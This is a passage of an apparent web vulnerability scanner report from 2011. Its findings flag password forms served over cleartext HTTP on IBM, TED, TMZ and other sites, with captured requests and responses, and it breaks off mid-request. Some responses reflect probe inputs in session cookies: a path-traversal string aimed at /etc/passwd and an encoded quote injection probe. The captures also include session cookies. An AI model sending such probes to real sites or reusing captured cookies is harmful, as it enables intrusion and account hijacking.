Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 81509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<div id="dw-mast-sso-form">
                               <form id="sForm_mf" action="" method="post" name="sForm_name_mf" onsubmit="return false;">
                                   <div id="dw-mast-sso-id" class="dw-mast-sso-id-en">
...[SNIP]...
</label>
                                       <input id="pw_mf" type="password" value="" name="pw_name_mf" maxlength="100" onkeypress="handleEP(event,this.form,'mf');"/>
                                   </div>
...[SNIP]...

7.13. http://www.ibm.com/developerworks/tivoli/library/s-csscript/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/tivoli/library/s-csscript/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /developerworks/tivoli/library/s-csscript/ HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search?sn=mh&q=xss&lang=en&cc=us&en=utf
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:06 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 81509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
</p>
<form class="ibm-column-form" id="sFormId" action="" method="post" name="sForm" onsubmit="return false;">
<p>
...[SNIP]...
<span><input name="password" id="password" size="25" value="" class="required" type="password" onkeypress="handleEP(event,this.form);" /><br />
...[SNIP]...

7.14. http://www.ibm.com/search/csass/search/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /search/csass/search/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/tivoli/library/s-csscript/
Cookie: IBMCSACOOKIE=unknown-Qio3QRdmTmRds9wLjxSq85quQNDMBtIsFvFfdWFBh0E=--; ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:34 GMT
Server: IBM_HTTP_Server
Vary: User-Agent
Set-Cookie: IBMCSACOOKIE=unknown-Qio3QRdmTmRds9wLjxSq85quQNDMBtIsFvFfdWFBh0E=--
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=3600, no-cache=set-cookie
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Vary: User-Agent, Accept-Encoding
Content-Length: 63016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- properties.ftl--><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="
...[SNIP]...
<div id="dw-mast-sso-form">
                               <form id="sForm_mf" action="" method="post" name="sForm_name_mf" onsubmit="return false;">
                                   <div id="dw-mast-sso-id" class="dw-mast-sso-id-en">
...[SNIP]...
</label>
                                       <input id="pw_mf" type="password" value="" name="pw_name_mf" maxlength="100" onkeypress="handleEP(event,this.form,'mf');"/>
                                   </div>
...[SNIP]...

7.15. http://www.ted.com/js/library.min.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ted.com
Path:   /js/library.min.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /js/library.min.js?1316119359 HTTP/1.1
Host: www.ted.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ted.com/webcast/archive/event/ibmwatson
Cookie: symfony=6rh1uq799n643l7plr6irjcis1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:54:13 GMT
Content-Type: application/x-javascript
Last-Modified: Thu, 15 Sep 2011 20:41:52 GMT
Connection: keep-alive
Expires: Sun, 16 Oct 2011 19:54:13 GMT
Cache-Control: max-age=2592000
Content-Length: 254325

var sponsor_popover={_init:function(){this.element.height(this._getData("adSpace_height"));this.payload=this._getData("payload");this.setup_img();this.setup_tracking();if(this.payload.video.length){th
...[SNIP]...
</p><form name="form_signin" id="form_signin" method="post" action="/session"><div class="clearfix">
...[SNIP]...
</label><input type="password" name="users[password]" id="users_password" value="" class="text" /></div>
...[SNIP]...

7.16. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://traffic.outbrain.com/network/redir?key=467a26e36b344d031207fb454f356be4&rdid=231534154&type=YLD_def_ch&in-site=true&req_id=da23b34cfa8657c71e50520363d1bbbe&agent=blog_JS_rec&recMode=4&reqType=1&wid=100&imgType=0&refPub=347&prs=false&scp=false&version=42206&idx=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_campaign=hero3; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DMichaele%252520Salahi%252520--%252520%252526%252523039%25253BWild%252520Sex%252526%252523039%25253B%252520Claims%252520with%252520Journey%252520Guitarist%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:00:18 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:00:18 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562eff7c43ff78cfa8bd07; expires=Sun, 20-Feb-2028 01:00:18 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 112256
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
<div id="comments">

<form id="commentform" action="#commentform" name="commentform" method="post" onsubmit="return commentForm.validate({facebook:{perms:'publish_stream,user_likes'}});">
   <div id="cmttabs">
...[SNIP]...
<br />
           <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/><br />
...[SNIP]...

7.17. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/?adid=hero2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_wb_ftcv=Sep2011%3AADID%3Ahero2; s_campaign=hero2; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DRon%252520Artest%252520--%252520Name%252520Change%252520Official%252520...%252520Say%252520Hello%252520to%252520World%252520Peace%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-ch%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:58:47 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:58:47 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562eff1d45dc9035b97879; expires=Sun, 20-Feb-2028 00:58:47 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 115459
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
<div id="comments">

<form id="commentform" action="#commentform" name="commentform" method="post" onsubmit="return commentForm.validate({facebook:{perms:'publish_stream,user_likes'}});">
   <div id="cmttabs">
...[SNIP]...
<br />
           <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/><br />
...[SNIP]...

7.18. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; s_campaign=hero3; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253D%252526%252523039%25253BNCIS%252526%252523039%25253B%252520Actor%252520--%252520Dead%252520Mother%252520Insult%252520Led%252520to%252520Violence%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-i%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:00:46 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:00:46 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562effac2cf8f69d82c880; expires=Sun, 20-Feb-2028 01:00:46 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 115860
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
<div id="comments">

<form id="commentform" action="#commentform" name="commentform" method="post" onsubmit="return commentForm.validate({facebook:{perms:'publish_stream,user_likes'}});">
   <div id="cmttabs">
...[SNIP]...
<br />
           <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/><br />
...[SNIP]...

7.19. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_sq=wbrostmz%3D%2526pid%253DCelebrity%252520Gossip%252520%25257C%252520Entertainment%252520News%252520%25257C%252520Celebrity%252520News%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:56:17 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:56:18 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; expires=Sun, 20-Feb-2028 00:56:17 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 112027
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
<div id="comments">

<form id="commentform" action="#commentform" name="commentform" method="post" onsubmit="return commentForm.validate({facebook:{perms:'publish_stream,user_likes'}});">
   <div id="cmttabs">
...[SNIP]...
<br />
           <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/><br />
...[SNIP]...

7.20. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/?adid=hero2 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_sq=wbrostmz%3D%2526pid%253DNancy%252520Grace%252520--%252520RUMPSHAKIN%252526%252523039%25253B%252520in%252520the%252520TMZ%252520Ballroom%252521%252521%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petit_2%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:58:11 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:58:11 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; expires=Sun, 20-Feb-2028 00:58:11 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 111374
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
<div id="comments">

<form id="commentform" action="#commentform" name="commentform" method="post" onsubmit="return commentForm.validate({facebook:{perms:'publish_stream,user_likes'}});">
   <div id="cmttabs">
...[SNIP]...
<br />
           <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/><br />
...[SNIP]...

7.21. http://www.tmz.com/signin/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /signin/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /signin/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_campaign=hero1; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DJustin%252520Timberlake%25253A%252520%252520Not%252520My%252520Penis%252521%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/signin/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:02:07 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:02:07 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2%2527; expires=Sun, 20-Feb-2028 01:02:07 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 49975
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text
...[SNIP]...
</h2>


<form id="signin-form" method="post">
       <p>
...[SNIP]...
<div><input type="password" name="Password" id="Password" class="form" size="50" /></div>
...[SNIP]...

7.22. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toofab.com
Path:   /2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/ HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1777464361-1316238721670; phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; s_cc=true; s_sq=wbrostoofab%3D%2526pid%253DCeleb%252520Couples%252520%25257C%252520tooFab%252521%2526pidt%253D1%2526oid%253Dhttp%25253A//www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:08:42 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:08:42 GMT
Set-Cookie: phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd; expires=Sun, 20-Feb-2028 01:08:42 GMT; path=/; domain=www.toofab.com
Vary: Accept-Encoding
Content-Length: 41681
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div class="commentbox">
<form id="comment-form" action="#commentform" name="commentform" method="post" data-fb="{perms:'publish_stream,user_likes'}">
   <!--
   <div id="cmttabs">
...[SNIP]...
<br />
           <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/><br />
...[SNIP]...

7.23. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toofab.com
Path:   /2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/ HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __qca=P0-1777464361-1316238721670; s_sq=wbrostoofab%3D%2526pid%253DTooFab%252520Homepage%252520%25255B%25255D%2526pidt%253D1%2526oid%253Dhttp%25253A//www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:50:59 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:50:59 GMT
Set-Cookie: phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; expires=Sun, 20-Feb-2028 00:50:59 GMT; path=/; domain=www.toofab.com
Vary: Accept-Encoding
Content-Length: 71853
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div class="commentbox">
<form id="comment-form" action="#commentform" name="commentform" method="post" data-fb="{perms:'publish_stream,user_likes'}">
   <!--
   <div id="cmttabs">
...[SNIP]...
<br />
           <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/><br />
...[SNIP]...

7.24. http://www.usenetbinaries.com/l/newsgroups.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usenetbinaries.com
Path:   /l/newsgroups.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /l/newsgroups.html?r=aw;kw=usenet&gclid=CLHh78_AoqsCFRRSgwod8HVslQ HTTP/1.1
Host: www.usenetbinaries.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
